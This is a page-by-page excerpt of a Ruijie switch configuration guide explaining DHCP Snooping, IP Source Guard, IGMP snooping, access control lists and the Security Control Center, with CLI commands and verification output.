  • Page 846 (Scenario) Configuration Guide Configuring DHCP Snooping Deployment  The same as that in the section "Guarding Against IP/MAC Spoofing". 8.2.6 Detecting ARP Attacks Scenario Check the ARP packets from untrusted ports and filter out the ARP packets unmatched with the assignments of the DHCP server.
  • Page 847 Configuration Guide Configuring DHCP Snooping 8.3 Features Basic Concepts  DHCP Request Packets Request packets are sent from a DHCP client to a DHCP server, including DHCP-DISCOVER packets, DHCP-REQUEST packets, DHCP-DECLINE packets, DHCP-RELEASE packets and DHCP-INFORM packets.  DHCP Response Packets Response packets are sent from a DHCP server to a DHCP client, including DHCP-OFFER packets, DHCP-ACK packets and DHCP-NAK packets.
  • Page 848 Configuration Guide Configuring DHCP Snooping Snooping binding database. Combined with ARP detection and ARP check, DHCP Snooping controls the reliable assignment of IP addresses for legal clients.  DHCP Snooping Rate Limit DHCP Snooping rate limit function can be configured through the rate limit command of Network Foundation Protection Policy (NFPP).
  • Page 849 Configuration Guide Configuring DHCP Snooping Working Principle During snooping, check the receiving ports and the packet fields of packets to realize packet filtering, and modify the destination ports of packets to realize control of the transmit range of the packets.  Checking Ports On receipt of DHCP packets, a client first judges whether the packet receiving ports are DHCP Snooping trusted ports.
  • Page 850 Configuration Guide Configuring DHCP Snooping Working Principle During snooping, the binding database is updated timely based on the types of DHCP packets.  Generating Binding Entries When a DHCP-ACK packet on a trusted port is snooped, the client's IP address, MAC address, and lease time field are extracted together with the port ID (a wired interface index or a WLAN ID) and VLAN ID.
  • Page 851 Configuration Guide Configuring DHCP Snooping ip dhcp snooping information option format remote-id: Configures the sub-option remote-id of Option82 as a user-defined character string. ip dhcp snooping vlan information option format-type circuit-id string: Configures the sub-option circuit-id of Option82 as a user-defined character string. 8.4.1 Configuring Basic Features Configuration Effect ...
  • Page 852 Configuration Guide Configuring DHCP Snooping  Enable this feature to save the DHCP Snooping binding database information in time, in case the client reboots.  Unless otherwise noted, the feature should be configured on access devices.  Enabling BOOTP Support  Optional ...
  • Page 853 Configuration Guide Configuring DHCP Snooping Description. Command Mode: Interface configuration mode/WLAN security configuration mode. Usage Guide: Use this command to reject all DHCP request packets at the port, that is, to forbid all users under the port to apply for addresses via DHCP. ...
  • Page 854 Configuration Guide Configuring DHCP Snooping Mode. Usage Guide: Use this command to import the information from Flash documents to the DHCP Snooping binding database.  Configuring DHCP Snooping Trusted Ports Command [ no ] ip dhcp snooping trust Parameter Description. Command Mode: Interface configuration mode...
  • Page 855 (Scenario) Configuration Guide Configuring DHCP Snooping Scenario Figure 8-5  Configuration Enable DHCP Snooping on an access device (Switch B in this case).  Steps Configure the uplink port (port Gi 0/1 in this case) as a trusted port. B#configure terminal Enter configuration commands, one per line.
  • Page 856 Configuration Guide Configuring DHCP Snooping Total number of bindings: 1 MacAddress IpAddress Lease(sec) Type VLAN Interface ------------------ --------------- ------------ ------------- ----- -------------------- 0013.2049.9014 172.16.1.2 86207 dhcp-snooping 1 GigabitEthernet 0/11 Common Errors  The uplink port is not configured as a DHCP trusted port. ...
  • Page 857  Configuration Configuring basic functions of DHCP Snooping.  Steps Configuring Option82. Ruijie# configure terminal Ruijie(config)# ip dhcp snooping information option Ruijie(config)# end Verification Check the DHCP Snooping configuration. B#show ip dhcp snooping Switch DHCP Snooping status ENABLE DHCP Snooping Verification of hwaddr status...
  • Page 858 Configuration Guide Configuring DHCP Snooping 8.5 Monitoring Clearing Running the clear commands may lose vital information and thus interrupt services. Description / Command: Clears the DHCP Snooping binding database: clear ip dhcp snooping binding [ ip ] [ mac ] [ vlan vlan-id ] [ interface interface-id ]...
  • Page 859 (Scenario) Configuration Guide Configuring IP Source Guard 9 Configuring IP Source Guard 9.1 Overview The IP Source Guard function realizes hardware-based IP packet filtering to ensure that only the users having their information in the binding database can access networks normally, preventing users from forging IP packets. 9.2 Applications Application Description...
  • Page 860 Configuration Guide Configuring IP Source Guard  Enable DHCP Snooping on S to realize DHCP monitoring.  Set all downlink ports on S as DHCP untrusted ports.  Enable IP Source Guard on S to realize IP packet filtering.  Enable IP–MAC match mode for IP Source Guard on S, filtering IP packets based on IP and MAC addresses.
  • Page 861 It can be enabled using the ip verify source command. Usually IP Source Guard needs to work with DHCP Snooping. Therefore, DHCP Snooping should also be enabled. DHCP Snooping can be enabled at any time on Ruijie devices, either before or after IP Source Guard is enabled. ...
  • Page 862 Configuration Guide Configuring IP Source Guard The above-mentioned port can be a wired switching port, a layer-2 AP port or a layer-2 encapsulation sub-interface, or a WLAN interface. 9.4 Configuration Configuration Description and Command (Mandatory) It is used to enable IP Source Guard. ip verify source Enables IP Source Guard on a port.
  • Page 863 Enabling IP Source Guard on Port 1  Configuration Enable DHCP Snooping.  Steps Enable IP Source Guard. Ruijie(config)# interface GigabitEthernet 0/1 Ruijie(config-if-GigabitEthernet 0/1)# ip verify source Ruijie(config-if-GigabitEthernet 0/1)# end Ruijie(config)# wlansec 1 Ruijie(config-wlansec)# ip verify source port-security Ruijie(config-wlansec)# end...
  • Page 864 Enable IP Source Guard. Steps  Configure a static binding. Ruijie# configure terminal Ruijie(config)# ip source binding 00d0.f801.0101 vlan 1 192.168.4.243 interface GigabitEthernet 0/3 Ruijie(config)# end Verification Displays the address filtering table of IP Source Guard. Ruijie# show ip verify source...
  • Page 865 Enable DHCP Snooping.  Steps Enable IP Source Guard. Ruijie(config)# interface GigabitEthernet 0/1 Ruijie(config-if-GigabitEthernet 0/1)# ip verify source Ruijie(config-if-GigabitEthernet 0/1)# ip verify source exclude-vlan 1 Ruijie(config-if)# end Ruijie(config)# wlansec 1 Ruijie(config-wlansec)# ip verify source Ruijie(config-wlansec)# ip verify source exclude-vlan 1 Ruijie(config-wlansec)# end Display the configuration of excluded VLANs specified on a port.
  • Page 866 Configuration Guide Configuring IGMP Snooping 10 Configuring IGMP Snooping 10.1 Overview Internet Group Management Protocol (IGMP) snooping is a mechanism of listening to IP multicast. It is used to manage and control the forwarding of IP multicast traffic within VLANs, realizing Layer-2 multicasting. As shown in the following figure, when a Layer-2 device is not running IGMP snooping, IP multicast packets are broadcast within the VLAN;...
  • Page 867 Configuration Guide Configuring IGMP Snooping Protocols and Standards  RFC4541: Considerations for Internet Group Management Protocol (IGMP) and Multicast Listener Discovery (MLD) Snooping Switches 10.2 Applications Application Description Layer-2 Multicast Control Enables precise forwarding of Layer-2 multicast packets to avoid flooding at this layer. Conversion from Multicast to Unicast Realizes conversion from multicast to unicast from the AP to STAs.
  • Page 868 Configuration Guide Configuring IGMP Snooping Deployment Configure basic IGMP snooping functions. 10.2.2 Multicast-to-Unicast Conversion Scenario When multicast-to-unicast conversion is not configured, packets are transmitted from the AP to STAs in multicast mode. There is no acknowledgement and retransmission mechanism for multicast packets in wireless networks. As a result, severe packet loss occurs, which affects the experience of wireless multicast services such as video on demand.
  • Page 869 Configuration Guide Configuring IGMP Snooping Deployment Configure the multicast-to-unicast conversion function. The function is available only in wireless multicast scenarios. 10.3 Features Basic Concepts  Multicast Router Ports and Member Ports IGMP snooping is VLAN-based. The ports involved refer to the member ports within the VLAN. The device running IGMP snooping identifies the ports within the VLAN as a multicast router port or member port so as to manage and control the forwarding of IP multicast traffic within the VLAN.
  • Page 870 Configuration Guide Configuring IGMP Snooping can automatically detect the multicast router port and maintain the port dynamically. It also allows users to configure a static router port.  Member port: The port is on a Layer-2 multicast device and is connected to member hosts. It directs the profile members.
  • Page 871 Configuration Guide Configuring IGMP Snooping Ruijie# show ip igmp snooping gda-table Multicast Switching Cache Table D: DYNAMIC //Dynamic member port S: STATIC //Static member port M: MROUTE //Multicast router port (dynamic or static) (*, 233.3.6.29, 1): //(S: any; G: 233.3.6.29; VLAN_ID: VLAN 1)
  • Page 872 For the IGMPv3 Report packets, Ruijie products handle only the profile information but not the source information. When the device running IGMP snooping receives the Report packets, it performs the following operations within the VLAN: ...
  • Page 873 Configuration Guide Configuring IGMP Snooping  Leave Packets If a host requests to leave a profile, it will send a Leave packet. When the device running IGMP snooping receives the Leave packets, it performs the following operations within the VLAN: ...
  • Page 874 Configuration Guide Configuring IGMP Snooping  Configuring the Aging Time of a Dynamic Router Port The default aging time is 300s. When a dynamic router port receives a query packet, the aging timer of the port is enabled or reset; if the aging time is not configured, the maximum response time carried by the query packet is used as the aging time.
  • Page 875 Configuration Guide Configuring IGMP Snooping 10.3.3 IGMP Querier On a network with a Layer-3 multicast device, the Layer-3 multicast device acts as an IGMP querier. In this case, a Layer-2 device needs only to listen to IGMP packets to establish and maintain the forwarding entry, realizing Layer-2 multicast. On a network without a Layer-3 multicast device, the Layer-2 multicast device must be configured with the IGMP querier function so that the device can listen to IGMP packets.
  • Page 876 Configuration Guide Configuring IGMP Snooping Related Configuration  Enabling the Querier Function By default, the querier function of a device is disabled. Run the ip igmp snooping querier command to enable the global querier function. Run the ip igmp snooping vlan num querier command to enable the querier function for specific VLANs. ...
  • Page 877 Configuration Guide Configuring IGMP Snooping 10.3.4 Multicast-to-Unicast Conversion The multicast-to-unicast conversion function is available only in a wireless environment. After the function is configured on a wireless device, multicast packets between an AP and STAs are transmitted in unicast mode. The multicast-to-unicast conversion function runs on the AP.
  • Page 878 Configuration Guide Configuring IGMP Snooping  Configuring the Multicast Range for Multicast-to-Unicast Conversion By default, multicast-to-unicast conversion is available to all multicast profiles. Use AC as an example. In ap-config mode, run the igmp snooping mcast-to-unicast group-range command to configure the profile address range for multicast-to-unicast conversion.
  • Page 879 Configuration Guide Configuring IGMP Snooping Mode) ip igmp snooping Enables IGMP Snooping globally. ip igmp snooping (in ap-config mode of the AC) Enables multicast on the AP. no ip igmp snooping vlan num Disables IGMP snooping for a VLAN. (Optional) It is used to adjust relevant configurations for processing protocol packets. ip igmp snooping vlan vlan-id mrouter Configures a static router port.
  • Page 880 Configuration Guide Configuring IGMP Snooping Configures the maximum response time igmp snooping vlan querier max-response-time num of query packets for a VLAN. Configures the aging timer for queriers ip igmp snooping querier timer expiry num globally. ip igmp snooping vlan num querier timer Configures the aging timer for a querier of a VLAN.
  • Page 881 Configuration Guide Configuring IGMP Snooping Configuration Steps  Enabling Global IGMP Snooping Mandatory. After global multicast configuration is enabled, enable IGMP Snooping so that IGMP Snooping takes effect.  Disabling IGMP Snooping for a VLAN (Optional) You can use this function if you wish to disable IGMP snooping on specified VLANs. IGMP snooping can be disabled on specified VLANs only when global IGMP snooping is enabled.
  • Page 882 Configuration Guide Configuring IGMP Snooping Command show ip igmp snooping gda-table Parameter Description Privileged EXEC mode, global configuration mode, or interface configuration mode Command Mode This command is used to verify that the ports include only those connecting member hosts. Usage Guide ...
  • Page 883 Configuration Guide Configuring IGMP Snooping A# configure terminal A(config)# ip multicast-routing A(config)# interface GigabitEthernet 0/1 A(config-if-GigabitEthernet 0/1)# ip pim sparse-mode A(config-if-GigabitEthernet 0/1)# exit A(config)# interface vlan 1 A(config-if-VLAN 1)# ip pim sparse-mode A(config-if-VLAN 1)# exit B# configure terminal B(config)# ip igmp snooping ivgl Send packets from the source (10.1.1.1) to G (229.1.1.1) to add Receiver 1 to G.
  • Page 884 Configuration Guide Configuring IGMP Snooping ------------- IGMP Snooping state: Enable Multicast router learning mode: pim-dvmrp IGMP Fast-Leave: Disabled IGMP VLAN querier: Disable IGMP VLAN Mode: STATIC Common Errors  The working mode of IGMP snooping is improper. 10.4.2 Configuring the Packet Processing Configuration Effect ...
  • Page 885 Configuration Guide Configuring IGMP Snooping  When there are numerous receivers to receive the packets from the same multicast profile, you can enable Report packets suppression to suppress the number of Report packets to be sent.  Enabling the Immediate-Leave Function ...
  • Page 886 Configuration Guide Configuring IGMP Snooping Command Global configuration mode Mode In SVGL mode, if a sub VLAN is not configured, only the configurations for the static router port within the Usage Guide shared VLAN can take effect, and the others can be configured but cannot take effect. If a sub VLAN is configured, only the configurations for the static router port within the shared VLAN or a non-sub VLAN can take effect, and the others can be configured but cannot take effect.
  • Page 887 Configuration Guide Configuring IGMP Snooping receives a leave packet. After that, the packets will no longer be forwarded to this port when it receives the query packets of specified profiles. Leave packets include the IGMPv2 Leave packets as well as the IGMPv3 Report packets that include types but carry no source address.
  • Page 888 Privileged EXEC mode, global configuration mode, or interface configuration mode Mode Usage Guide If the router port is successfully configured, an "S" will be displayed in the port information. Ruijie(config)#show ip igmp snooping mrouter Multicast Switching Mroute Port D: DYNAMIC S: STATIC...
  • Page 889 Privileged EXEC mode, global configuration mode, or interface configuration mode Mode Usage Guide If the member port is successfully configured, an "S" will be displayed in the port information. Ruijie(config)#show ip igmp snooping gda-table Multicast Switching Cache Table D: DYNAMIC S: STATIC M: MROUTE (*, 224.1.1.1, 1):...
  • Page 890 Configure a static router port and static member port. Ruijie# configure terminal Ruijie(config)# ip igmp snooping vlan 1 mrouter interface GigabitEthernet 0/0 Ruijie(config)# ip igmp snooping vlan 1 static 224.1.1.1 interface GigabitEthernet 0/0 Ruijie(config)# end Verification Run the show ip igmp snooping mrouter and show ip igmp snooping gda-table commands to check whether the configuration takes effect.
  • Page 891 Configuration Guide Configuring IGMP Snooping A is the multicast router and is connected directly to multicast Source 1. B is a Layer-2 device and is connected directly to the user host and multicast Source 2. Receiver 1, Receiver 2, and Receiver 3 are connected to VLAN 1. ...
  • Page 892 Configure the response time of a Query packet. Ruijie# configure terminal Ruijie(config)# ip igmp snooping fast-leave enable Ruijie(config)# no ip igmp snooping mrouter learn pim-dvmrp Ruijie(config)#ip igmp snooping dyn-mr-aging-time 200 Ruijie(config)#ip igmp snooping host-aging-time 100 Ruijie(config)#ip igmp snooping query-max-response-time 60 Ruijie(config)# end Run the show ip igmp snooping command to check whether the configuration is successful.
  • Page 893 Configuration Guide Configuring IGMP Snooping Configuration Steps  Enabling the Querier Function  (Optional) Enable IGMP querier function globally or for a specified VLAN.  (Optional) Disable the IGMP querier function for a specified VLAN.  Configuring the Source IP Address of a Querier ...
  • Page 894 Configuration Guide Configuring IGMP Snooping Parameter vlan vid: Specifies a VLAN. This configuration applies to all VLANs by default. Description a.b.c.d: Indicates the source IP address. Global configuration mode Command Mode After a querier is enabled, a source IP address must be specified for the querier; otherwise, the configuration Usage Guide will not take effect.
  • Page 895 Description Command Privileged EXEC mode, global configuration mode, or interface configuration mode Mode Usage Guide If QinQ is enabled, the following content is displayed. Ruijie(config)#show ip igmp snooping querier detail Vlan IP Address IGMP Version Port ----------------------------------------------------------- Global IGMP switch querier status...
  • Page 896 Configuration Guide Configuring IGMP Snooping Scenario Figure 10-9 In the scenario without Layer-3 multicast equipment, the multicast traffic can be forwarded only on the Layer-2 network. A acts as a Layer-2 device to connect to the multicast source and receiver. ...
  • Page 897 Configuration Guide Configuring IGMP Snooping max-response-time (sec) : 10 querier-timeout (sec) : 125 operational state : Querier operational version Common Errors  The source IP address is not configured for the querier and the querier does not take effect. 10.4.4 Configuring Multicast-to-Unicast Conversion Configuration Effect ...
  • Page 898 Configuration Guide Configuring IGMP Snooping Related Commands  Configuring Global Multicast Command ip multicast wlan Parameter Description Global configuration mode Command Mode Usage Guide If global multicast is enabled, multicast packets are processed only after they reach the AC. If global multicast is disabled, the AC directly discards the received multicast packets.
  • Page 899 Privileged EXEC mode, global configuration mode, and interface configuration mode Command Mode If multicast-to-unicast conversion is configured successfully, the following information is displayed: Usage Guide Ruijie(config)#sh ip igmp snooping WLAN Multicast: Enable IGMP Snooping running mode: IVGL IGMP Snooping M2U-Forward: Enable IGMP Snooping Support M2U Max-Group Num: 64 IGMP Snooping M2U Group range: 233.3.3.1-233.3.3.64...
  • Page 900 Configuration Guide Configuring IGMP Snooping Configuration  Enable IGMP Snooping on the AC. Steps  Enable global multicast on the AC.  Enable IGMP Snooping in ap-config mode.  Enable multicast-to-unicast conversion in ap-config mode.  Configure the maximum multicast range for multicast-to-unicast conversion in ap-config mode. ...
  • Page 901 Configuration Guide Configuring IGMP Snooping 10.4.5 Optimizing the Wireless Multicast Environment Configuration Effect  Configure the function of ignoring port timer resetting for query packets on the wireless device. Notes  IGMP Snooping basic functions must be configured. Configuration Steps ...
  • Page 902 Configuration Guide Configuring IGMP Snooping Displays the router ports. show ip igmp snooping mrouter Displays the IGMP snooping entries. show ip igmp snooping gda-table Displays the IGMP querier. show ip igmp snooping querier [ detail ] Displays the user information. show ip igmp snooping user-info Debugging System resources are occupied when debugging information is output.
  • Page 903 Configuration Guide Configuring ACL 11 Configuring ACL 11.1 Overview Access Control List (ACL) is also called access list or firewall. It is even called packet filtering in some documents. The ACL defines rules to determine whether to forward or drop data packets arriving at a network interface.
  • Page 904 Configuration Guide Configuring ACL Remarks Switch C at the access layer: It is connected to PCs of each department and to Switch B at the aggregation layer through the gigabit optical fiber (trunk mode). Switch B at the aggregation layer: Multiple virtual local area networks (VLANs) are divided. One VLAN is defined for one department.
  • Page 905 Configuration Guide Configuring ACL 11.3 Features Basic Concepts  ACLs include basic ACLs and dynamic ACLs. You can select basic or dynamic ACLs as required. Generally, basic ACLs can meet the security requirements. However, experienced hackers may use certain software to access the network by means of IP address spoofing.
  • Page 906 Configuration Guide Configuring ACL  Source IP address field (All source IP address values can be specified, or the subnet can be used to define a type of data flows.)  Destination IP address field (All destination IP address values can be specified, or the subnet can be used to define a type of data flows.) ...
  • Page 907 Configuration Guide Configuring ACL of L2 and L4 fields, or a combination of L2, L3, and L4 fields. To use a combination of L2, L3, and L4 fields, you can use the expert ACLs. An SVI associated with ACLs in the outgoing direction supports the IP standard, IP extended, MAC extended, and expert ACLs.
  • Page 908 Configuration Guide Configuring ACL SVI Router ACL Enable users in the same VLAN to communicate with each other. 11.3.1 IP ACL The IP ACL implements refined control on incoming and outgoing IPv4 packets of a device. You can permit or deny the entry of specific IPv4 packets to a network according to actual requirements to control access of IP users to network resources.
  • Page 909 Configuration Guide Configuring ACL For example: access-list 1 permit host 192.168.4.12 This ACL permits only packets sent from the source host 192.168.4.12, and denies packets sent from all other hosts. This is because the following statement exists at the end of this ACL: access-list 1 deny any. If the ACL contains only the following statement: access-list 1 deny host 192.168.4.12 Packets sent from any host will be denied when passing through this port.
  • Page 910 Configuration Guide Configuring ACL  No matter whether the standard IP ACL is a named or numbered ACL, you can run the following command in standard IP ACL mode to add an ACE: [ sn ] { permit | deny } { host source | any | source source-wildcard } [ time-range time-range-name ] ...
  • Page 911 Configuration Guide Configuring ACL Protocol ID Range MAC extended ACL 700–799 Typical rules defined in a MAC extended ACL include:  Source MAC address  Destination MAC address  Ethernet protocol type The MAC extended ACL (ID range: 700–799) is used to filter packets based on the source or destination MAC address and the Ethernet type in the packets.
  • Page 912 Configuration Guide Configuring ACL  No matter whether the MAC extended ACL is a named or numbered ACL, you can run the following command in MAC extended ACL mode to add an ACE: [ sn ] { permit | deny } { any | host src-mac-addr } { any | host dst-mac-addr } [ ethernet-type ] [ cos cos ] [ inner cos ] [ time-range tm-rng-name ] ...
  • Page 913 Configuration Guide Configuring ACL For an individual expert extended ACL, multiple independent statements can be used to define multiple rules. All statements reference the same ID or name so that these statements are bound with the same ACL. If rules in an expert extended ACL are not defined specifically for IPv6 packets, that is, the Ethernet type is not specified or the value of the Ethernet type field is not 0x86dd, the expert extended ACL does not filter IPv6 packets.
  • Page 914 Configuration Guide Configuring ACL  Applying an Expert Extended ACL By default, the expert extended ACL is not applied to any interface, that is, the created expert extended ACL does not filter incoming or outgoing L2 or L3 packets of a device. Run the expert access-group { acl-id | acl-name } { in| out } command in interface configuration mode to apply an expert extended ACL to a specified interface.
  • Page 915 Configuration Guide Configuring ACL For example: ipv6 access-list ipv6_acl 10 permit ipv6 any any 20 deny ipv6 host 200::1 any As the first rule statement permits all IPv6 packets, IPv6 packets sent from the host 200::1 do not match the subsequent deny rule with the serial number 20, and therefore will not be denied.
  • Page 916 Configuration Guide Configuring ACL a switch without undergoing the access control, such as port security, Web authentication, 802.1x, and IP+MAC binding check. A globally applied security channel takes effect on all interfaces except exclusive interfaces. The deny ACEs in an ACL that is applied to a security channel do not take effect. In addition, this ACL does not contain an implicit "deny all traffic"...
  • Page 917 Configuration Guide Configuring ACL 11.3.6 SVI Router ACL By default, an ACL that is applied to an SVI also takes effect on L2 packets forwarded within a VLAN and L3 packets forwarded between VLANs. Consequently, users in the same VLAN may fail to communicate with each other. Therefore, a switchover method is provided so that the ACL that is applied to an SVI takes effect only on routing packets between VLANs.
  • Page 918 Configuration Guide Configuring ACL deny host host dscp Adds a deny ACE to an extended IP ACL. precedence fragment time-range Applies a standard or an extended IP ACL. ip access-group in out Configuring (Optional) It is used to filter L2 packets. Extended ACL mac access-list extended Configures a MAC extended ACL.
  • Page 919 Configuration Guide Configuring ACL Configuring a Global Security (Optional) It is used to make an ACL take effect globally. Applies a global security ACL in global ip access-group in out configuration mode. Configures an interface as the exclusive interface of the global security ACL in no global ip access-group interface configuration mode.
  • Page 920 Configuration Guide Configuring ACL  You can configure this ACL on an access, an aggregate, or a core device based on the distribution of users. The IP ACL takes effect only on the local device, and does not affect other devices on the network. ...
  • Page 921 Configuration Guide Configuring ACL  Add ACEs to a standard IP ACL.  Use either of the following methods to add ACEs to a standard IP ACL: Command [ sn ] { permit | deny } {host source | any | source source-wildcard } [ time-range time-range-name ] Parameter sn: Indicates the sequence number of an ACE.
  • Page 922 Configuration Guide Configuring ACL  Add ACEs to an extended IP ACL.  Use either of the following methods to add ACEs to an extended IP ACL: Command [ sn ] { permit | deny } protocol {host source | any | source source-wildcard } {host destination | any | destination destination-wildcard } [ [ precedence precedence [ tos tos ] ] | dscp dscp] [ fragment ] [ time-range time-range-name ] Parameter...
  • Page 923 Configuration Guide Configuring ACL any | destination destination-wildcard } [ [ precedence precedence [ tos tos ] ] | dscp dscp] [ fragment ] [ time-range time-range-name ] Parameter acl-id: Indicates the ID of a numbered ACL. It uniquely identifies an ACL. The value range of acl-id is Description 100–199 and 2000–1999.
  • Page 924 Configuration Guide Configuring ACL  in: Indicates that this ACL controls incoming IP packets of the interface. out: Indicates that this ACL controls outgoing IP packets of the interface. reflect: Indicates that the reflexive ACL is enabled. Command Interface configuration mode Mode Usage Guide This command makes an IP ACL take effect on the incoming or outgoing packets of a specified interface.
  • Page 925 Configuration Guide Configuring ACL ip access-list standard 1 10 permit 10.1.1.0 0.0.0.255 20 deny 11.1.1.0 0.0.0.255 sw1(config)#show access-group ip access-group 1 out Applied On interface GigabitEthernet 0/3 11.4.2 Configuring a MAC Extended ACL Configuration Effect Configure and apply a MAC extended ACL to an interface to control all incoming and outgoing IPv4 packets of this interface. You can permit or deny the entry of specific L2 packets to a network to control access of users to network resources based on L2 packets.
  • Page 926 Configuration Guide Configuring ACL  If a MAC extended ACL is configured to permit or deny some IP packets, run the ping command to check whether the ACEs of this ACL take effect on the specified interface. For example, if a MAC extended ACL is configured to prevent a device interface from receiving IP packets (Ethernet type 0x0800), run the ping command for verification.
  • Page 927 Configuration Guide Configuring ACL deny: Indicates that the ACE is a deny ACE. any: Indicates that L2 packets sent from any host are filtered. host src-mac-addr: Indicates that IP packets sent from a host with the specified source MAC address are filtered.
  • Page 928 Configuration Guide Configuring ACL Parameter acl-id: Indicates that a numbered MAC extended ACL will be applied to the interface. Description acl-name: Indicates that a named MAC extended ACL will be applied to the interface. in: Indicates that this ACL controls incoming L2 packets of the interface. out: Indicates that this ACL controls outgoing L2 packets of the interface.
  • Page 929 Configuration Guide Configuring ACL  Verification On a visitor's PC, ping the financial data server. Verify that the ping operation fails.  On a visitor's PC, ping the public resource server. Verify that the ping operation succeeds.  On a visitor's PC, access the Internet, for example, visit the Baidu website. Verify that the webpage can be opened.
  • Page 930 Configuration Guide Configuring ACL  Use the following methods to verify the configuration effects of the expert extended ACL:  If IP-based access rules are configured in an expert extended ACL to permit or deny some IP packets, run the ping command to verify whether these rules take effect.
  • Page 931 Configuration Guide Configuring ACL deny: Indicates that the ACE is a deny ACE. protocol: Indicates the IP protocol number. The value ranges from 0 to 255. To facilitate the use, the system provides frequently-used abbreviations to replace the specific IP protocol numbers, including eigrp, gre, icmp, igmp, ip, ipinip, nos, ospf, tcp, and udp.
  • Page 932 Configuration Guide Configuring ACL Parameter acl-id: Indicates the ID of a numbered ACL. It uniquely identifies an ACL. The value range of acl-id is Description 2700-2899. permit: Indicates that the ACE is a permit ACE. deny: Indicates that the ACE is a deny ACE. protocol: Indicates the IP protocol number.
  • Page 933 Configuration Guide Configuring ACL Parameter  acl-id: Indicates that a numbered expert extended ACL will be applied to the interface. Description  acl-name: Indicates that a named expert extended ACL will be applied to the interface.  in: Indicates that this ACL controls incoming L2 packets of the interface. out: Indicates that this ACL controls outgoing L2 packets of the interface.
  • Page 934 Configuration Guide Configuring ACL sw1(config-exp-nacl)#permit any any any any sw1(config-exp-nacl)#exit sw1(config)#int gigabitEthernet 0/2 sw1(config-if-GigabitEthernet 0/2)#expert access-group 2700 in  Verification On a visitor's PC, ping the financial data server. Verify that the ping operation fails.  On a visitor's PC, ping the public resource server. Verify that the ping operation succeeds. ...
  • Page 935 Configuration Guide Configuring ACL  You can apply an IPv6 ACL on a specified interface of an access, an aggregate, or a core device based on the distribution of users. Verification  Use the following methods to verify the configuration effects of the IPv6 ACL: ...
  • Page 936 Configuration Guide Configuring ACL numbers, including icmp, ipv6, tcp, and udp. src-ipv6-prefix/prefix-len: Indicates that IP packets sent from hosts in the specified IPv6 network segment are filtered. host src-ipv6-addr: Indicates that IPv6 packets sent from a host with the specified source IP address are filtered.
  • Page 937 Configuration Guide Configuring ACL numbers, including icmp, ipv6, tcp, and udp. src-ipv6-prefix/prefix-len: Indicates that IP packets sent from hosts in the specified IPv6 network segment are filtered. host src-ipv6-addr: Indicates that IPv6 packets sent from a host with the specified source IP address are filtered.
  • Page 938 Configuration Guide Configuring ACL Scenario Figure 11-6  Configuration Configure an IPv6 ACL.  Steps Add an ACE to the IPv6 ACL to prevent access to the video server.  Add an ACE to the IPv6 ACL to permit all IPv6 packets. ...
  • Page 939 Configuration Guide Configuring ACL interface of a user, but the user should be allowed to log in to a website to download some resources (for example, downloading the Ruijie SU client) before the DOT1X authentication. Configuration Steps  Configuring an ACL ...
  • Page 940 Configuration Guide Configuring ACL For details about how to add ACEs to an ACL, see the earlier descriptions about the IP ACL, MAC extended ACL, expert extended ACL, or IPv6 ACL.  Configuring a Security Channel on an Interface Command security access-group {acl-id | acl-name } Parameter ...
  • Page 941 Configuration Guide Configuring ACL Scenario Figure 11-7  Configuration Configure an expert extended ACL "exp_ext_esc".  Steps Add an ACE to allow forwarding packets to the destination host 10.1.1.2.  Add an ACE to permit the DHCP packets.  Add an ACE to permit the ARP packets. ...
  • Page 942 Configuration Guide Configuring ACL Building configuration... Current configuration : 59 bytes interface GigabitEthernet 0/1 security access-group exp_ext_esc 11.4.6 Configuring the Time Range-Based ACEs Configuration Effect Configure the time range-based ACEs if you want some ACEs to take effect or to become invalid in a specified period of time, for example, in some time ranges during a week.
  • Page 943 Add an ACE to permit all packets.  Apply the ACL to the outgoing direction of the interface connected to the breakout gateway. Ruijie(config)# time-range access-internet Ruijie(config-time-range)# periodic daily 12:00 to 13:30 Ruijie(config-time-range)# exit sw1(config)# ip access-list standard ip_std_internet_acl sw1(config-std-nacl)# permit 10.1.1.0 0.0.0.255 time-range access-internet...
  • Page 944 Configuration Guide Configuring ACL sw1(config-std-nacl)# deny 10.1.1.0 0.0.0.255 sw1(config-std-nacl)# permit any sw1(config-std-nacl)# exit sw1(config)#int gigabitEthernet 0/2 sw1(config-if-GigabitEthernet 0/2)# ip access-group ip_std_internet_acl out  Verification Within the time range between 12:00 and 13:30, visit the Baidu website on a PC of the R&D department.
  • Page 945 Configuration Guide Configuring ACL  Configuring Comments for ACLs  (Optional) Configure comments for ACLs so that it is easy to manage and understand the configured ACLs.  Adding ACEs to an ACL  (Optional) An ACL may contain zero or multiple ACEs. If no ACE is configured, this is equivalent to the security channel not taking effect.
  • Page 946 Configuration Guide Configuring ACL  Adding ACEs to an ACL For details about how to add ACEs to an ACL, see the earlier descriptions about the IP ACL, MAC extended ACL, expert extended ACL, or IPv6 ACL.  Configuring Comments for ACEs Use either of the following two methods to configure a comment for an ACE: Command remark comment...
  • Page 947 Configuration Guide Configuring ACL Displays the MAC extended ACL configurations applied to show mac access-group [interface interface-name ] an interface. Displays the expert extended ACL configurations applied to show expert access-group [interface interface-name ] an interface. Displays the IPv6 ACL configurations applied to an show ipv6 traffic-filter [interface interface-name ] interface.
  • Page 948: Scenario

    Configuration Guide Configuring SCC 12 Configuring SCC 12.1 Overview The Security Control Center (SCC) provides common configuration methods and policy integration for various access control and network security services, so that these access control and network security services can coexist on one device to meet diversified access and security control requirements in various scenarios.
  • Page 949 Note A traditional campus network is hierarchically designed, consisting of an access layer, a convergence layer and a core layer, where the access layer performs user access control. On an extended Layer 2 campus network, however, user access control is performed by a core switch, below which access switches exist without any convergence device in between.
  • Page 950 • On the downlink ports of the core switch (switch A in this example) that connect to the teachers' living area and the students' living area, both dot1x authentication and Web authentication are enabled, so that users can freely select either authentication mode for Internet access.
  • Page 951 12.4 Configuration Configuration Item: Configuring User Online-Status Detection. Suggestions and Related Commands: Optional configuration, which is used to specify whether to enable the user online-status detection function. offline-detect interval threshold: Configures the parameters of the user online-status detection function.
  • Page 952 default offline-detect: Restores the default value. In other words, an online user will be disconnected when the device detects that the user has not had any traffic within eight hours. Default Configuration: 8 hours. Command Mode: Global configuration mode. Usage Guide Use this command to configure user online-status detection, so that a user is disconnected when its traffic is...
  • Page 953 • Configure user online-status detection so that a user is disconnected if the user has no traffic within five minutes. Switch A sw1(config)# offline-detect interval 5 threshold 0 • Verification Perform dot1x authentication using the dot1x SU client for a PC in the R&D department, so that the PC gets online.
